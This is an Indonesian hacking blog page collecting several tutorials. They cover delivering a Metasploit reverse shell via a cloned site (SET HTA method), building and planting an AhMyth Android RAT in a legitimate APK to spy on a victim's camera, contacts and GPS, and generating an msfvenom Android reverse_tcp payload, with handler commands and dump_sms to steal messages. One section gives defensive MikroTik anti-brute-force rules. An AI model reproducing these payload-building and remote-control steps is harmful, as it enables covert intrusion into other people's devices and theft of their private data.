Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Exploit. Tampilkan semua postingan

Hack Windows using HTA Method


HTA Method ?

HTA Method adalah suatu metode yang digunakan unutk mengirim dan menjalankan exploit dengan menyisipkan exploit tersebut kedalam file yang telah ditanam di fake website.

Langkah-langkah


1. Pastikan sudah memepunya setoolkit. Buka tool tersebut, lalu pilih Social-Engineering Attacks.


2. Selanjutnya pilih Website Attack Vectors.


3. Selanjutnya kita pilih jenis method yang akan digunakan, sesuai judul kita gunakan HTA Method.


4. Nah, disini kita pilih site cloner saja karena paling mudah tanpa perlu upload file web yang akan dibuat fake website.


5. Selanjutnya isi url website yang akan kita clone. Disini saya menggunakan google.


6. Untuk Lhostnya disesuaikan dengan ip masing-masing. ip pc saya adalah 192.168.1.6.


7. nah untuk reverse port payloadnya biarkan default 433


8. Untuk type port yang digunakan pilih TCP.


9. Kita tunggu sampai metasploit siap menjalankan exploitnya. Contoh metasploit sudah siap.


10. Langsung saja eksekusi shellnya yang berada di pc target. Ketik ip lhost yang telah diset tadi yaitu 192.168.1.6 (tergantung ip masing-masing). Tunggu sebentar nanti akan ada pop-up download file (exploit), silahkan di download dan dijalankan dan tunggu saja beberapa saat, dan liat di terminal metasploit menunjukkan bahwa sessions dari pc target telah terbuka. Berikut gambarannya :


[NOTE]
Sebagai manusia yang masih mempunyai akal yg sehat gunakan dengan hal yang bermanfaat. Ingat etika itu penting, meskipun anda seorang underground.

Apabila masih bingung bisa dilihat video tutorial disini




Pencegahan Serangan Bruteforce Terhadap RouterBoard Mikrotik


Apa itu Brute Force ?

Brute Force adalah suatu serangan yang dapat meningkatkan resource cpu secara drastis, karena mencoba seluruh kemungkinan kata yang telah dikumpiulkan oleh si penyerang. Metode yang digunakan Brute Force ini cukup Kompleks dengan mencoba seluruh kata yang telah diatur untuk melakukan proses authentikasi secara cepat (tergantung jumlah wordlist). Proses keberhasilan metode ini tergantung dari kata yang berhasil di kumpulkan si penyerang.

Langkah Pengamanan Brute Force di RouterBoard Mikrotik


Contoh log files Mikrotik yang diserang metode bruteforce :


Diatas adalah contoh serangan Brute Force yang ditujukan untuk menjebol routerboard melalui protokol ssh.

Penanganan Brute force dengan mendisable service

1. Disable Service ssh


2. Disable service ftp


3. Disable service telnet


Penanganan Serangan Brute Force dengan Firewall
Cara ini digunakan apabila masih mebutuhkan service-service diatas tanpa melakukan disable. Cara ini cukup efektif untuk melakukan blok terhadap serangan brute force.

Filter rules anti brute force
/ip firewall filter
add action=drop chain=input comment=”drop ftp brute forcers” dst-port=21 \
protocol=tcp src-address-list=ftp_blacklist
add chain=output content=”530 Login incorrect” dst-limit=1/1m,9,dst-address/1m \
protocol=tcp
add action=add-dst-to-address-list address-list=ftp_blacklist \
address-list-timeout=3h chain=output content=”530 Login incorrect” protocol=\
tcp
add action=drop chain=input comment=”drop ssh brute forcers” dst-port=22 \
protocol=tcp src-address-list=ssh_blacklist
add action=add-src-to-address-list address-list=ssh_blacklist \
address-list-timeout=1w3d chain=input connection-state=new dst-port=22 \
protocol=tcp src-address-list=ssh_stage3
add action=add-src-to-address-list address-list=ssh_stage3 address-list-timeout=\
1m chain=input connection-state=new dst-port=22 protocol=tcp \
src-address-list=ssh_stage2
add action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=\
1m chain=input connection-state=new dst-port=22 protocol=tcp \
src-address-list=ssh_stage1
add action=add-src-to-address-list address-list=ssh_stage1 address-list-timeout=\
1m chain=input connection-state=new dst-port=22 protocol=tcp

Pada dasarnya alur dari firewall yang telah di buat adalah, jika ada yang coba coba masuk via SSH IP yang mencoba masuk ke router mikrotik secara berkali kali otomatis akan masuk ke address yang telah di buat tadi “address-list=ssh_blacklist da nip ip tersebut akan secara otomatis di drop, jadi tidak akan bisa lagi bertingkah yang tidak tidak dengan mikrotik yang kita miliki

Bagitu juga dengan yang lain, jika ada yang coba coba brute force masuk via FTP, maka firewall akan mendeteksi dan akan memasukkan sumber IP yang coba coba brute force ke address list dan otomatis akan di drop. Rull nya ada di “ address-list=ftp_blacklist.

Source : Ebook Prevention Login Brute Force Mikrotik

Tulpar - Web Scanner Vulnerability


What is Tulpar ?

Tulpar adalah sebuah tool open source yang diciptakan untuk melakukan pengecekan terhadap kerentanan (vulnerability) suatu web.

Features

      -Sql Injection (GET Method)
      -XSS (GET Method)
      -Crawl
      -E-mail Disclosure
      -Credit Card Disclosure
      -Whois
      -Command Injection (GET Method)
      -Directory Traversal (GET Method)
      -File Include (GET Method)
      -Server Information
      -Technology Information
      -X-Content-Type Check
      -X-XSS-Protection Check
      -TCP Port Scanner
      -robots.txt Check
      -URL Encode
      -Certification Information
      -Available Methods
      -Cyber Threat Intelligence
      -IP2Location
      -File Input Available Check

Installation

git clone https://github.com/anilbaranyelken/tulpar.git
cd tulpar
pip install -r requirements

Usage

python tulpar.py action web_URL
Action: full xss sql fuzzing e-mail credit-card whois links portscanner urlEncode cyberthreatintelligence commandInjection directoryTraversal fileInclude headerCheck certificate method IP2Location FileInputAvailable

Example

Kita coba lakukan pengumpulan informasi dns dengan method whois :


Untuk lainnya bisa di coba sendiri.

[NOTE]
Sebagai manusia yang masih mempunyai akal yg sehat gunakan dengan hal yang bermanfaat. Ingat etika itu penting, meskipun anda seorang underground.

Source : https://github.com/tulpar/tulpar

Scan SSL Vulnerability using A2SV


1. Apa itu A2SV ?
A2SV (auto scanning ssl vulnerability) adalah sebuah tool yang dirancang khusus dengan tujuan mencari vulnerability dari ssl.

2. Support Vulnerability

      [CVE-2007-1858] Anonymous Cipher
      [CVE-2012-4929] CRIME(SPDY)
      [CVE-2014-0160] CCS Injection
      [CVE-2014-0224] HeartBleed
      [CVE-2014-3566] SSLv3 POODLE
      [CVE-2015-0204] FREAK Attack
      [CVE-2015-4000] LOGJAM Attack
      [CVE-2016-0800] SSLv2 DROWN

2. How to Install?

A. Download(clone) & Unpack A2SV
#git clone https://github.com/hahwul/a2sv.git
#cd a2sv

B. Install Python Package / OpenSSL
#pip install argparse
#pip install netaddr
#apt-get install openssl

C. Run A2SV
#python a2sv.py -h

or

#./install.sh ======= and then open in your terminal "a2sv"

3. How to Use ?


Trying on website [sensor] :
1. a2sv -t bing.com
ini adalah contoh hasil scan menggunakan a2sv :


Bisa dilihat website [sensor] mempunyai vuln seperti di hasil scan.

[NOTE]
Sebagai manusia yang masih mempunyai akal yg sehat gunakan dengan hal yang bermanfaat. Ingat etika itu penting, meskipun anda seorang underground.

[Update A2SV]
#python a2sv.py -u
#python a2sv.py --update

Source : https://github.com/hahwul/a2sv

Controll Android using AhMyth Over Network (beda jaringan)

https://camo.githubusercontent.com/7fea8685062d44c9846d6ef5bcab1aeeb74659ed/687474703a2f2f692e696d6775722e636f6d2f484d3375584c362e706e67

Requiretments

  • AhMyth-Android-RAT

Installasi AhMyth on Linux


Link Download https://github.com/AhMyth/AhMyth-Android-RAT

Ada 2 cara penginstallan AhMyth :

A. Source Code

1. git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
2. cd AhMyth-Android-RAT/AhMyth-Server
3. npm start

B. Binaries File

Download a binary from https://github.com/AhMyth/AhMyth-Android-RAT/releases

Langkah-Langkah

1. Pastikan AhMyth sudah terinstall, buka AhMyth.

2. Kita buat exploitnya terlebih dahulu. Disitu terdapat source ip yang artinya adalah ip dari orang yang akan meremote target nanti. Untuk melakukan pemalsuan ip bisa menggunakan tool anonsurf (baca selengkapnya tentang anonsurf)


3. untuk bagian portnya isi dengan 4444, untuk exploitnya bisa diembbed dengan apk asli.

4. Entah bagaimana cara kalian pastikan exploit apk yang telah dibuat tadi terinstall di ponsel target.

5. Untuk mengetahui target sudah masuk dalam list, bisa dicek dengan melakukan listening pada port yang telah dibuat tadi.

6. apabila ada maka akan muncul list target, selanjutnya bisa kalian liat dari tool AhMyth tersebut mulai dari kamera, kontak, file manager, hingga gps ponsel.

Apabila kurang paham bisa kontak facebook saya atau tinggalkan komentar di kolom bawah.

Gunakan untuk pembeljaran, hal-hal yang merugikan diluar tanggung jawab penulis.











Controll Android with Metasploit


Langsung saja

Requiretments


  • Tool Metasploit
  • One Network (berada dalam 1 jaringan)

Langkah-langkah

1. Pertama buat Payload terlebih dahulu (software ini akan menjadi sebagai jembatan penghubung victim dengan metasploit)
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.164 LPORT=4444 > android.apk


Untuk ip Lhost sesuaikan dengan ip masing-masing.


Sampai disini Payload telah jadi saatnya kalian membagikan kepada target kalian, entah bagaimana cara kalian intinya payload tersebut harus berhasil terinstall dan terbuka di android target.





2. Selanjutnya kita buka Metasploit
# msfconsole


3. Lalu lakukan konfigurasi seperti dibawah ini :
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.164
msf exploit(multi/handler) > set LPORT 4444


4. Lalu cek apakah sudah ter pasang semua konfigurasi diatas
msf exploit(multi/handler) > show options


5. Kita Jalankan exploit kita
msf exploit(multi/handler) > exploit


6. Untuk mengetahui command yang dipakai gunakan perintah help


7. Kita coba import seluruh sms yang ada dalam target
meterpreter > dump_sms


output file berada di folder home atau root


8. Untuk yang lainnya silahkan explore sendiri :D

Semoga sukses dan berhasil

Seluruh kejadian yang terjadi bukan menjadi tanggung jawab saya
Gunakan dengan bijak serta untuk suatu hal yang positif
Apabila ada pertanyaan silahkan contact atau komentar dibawah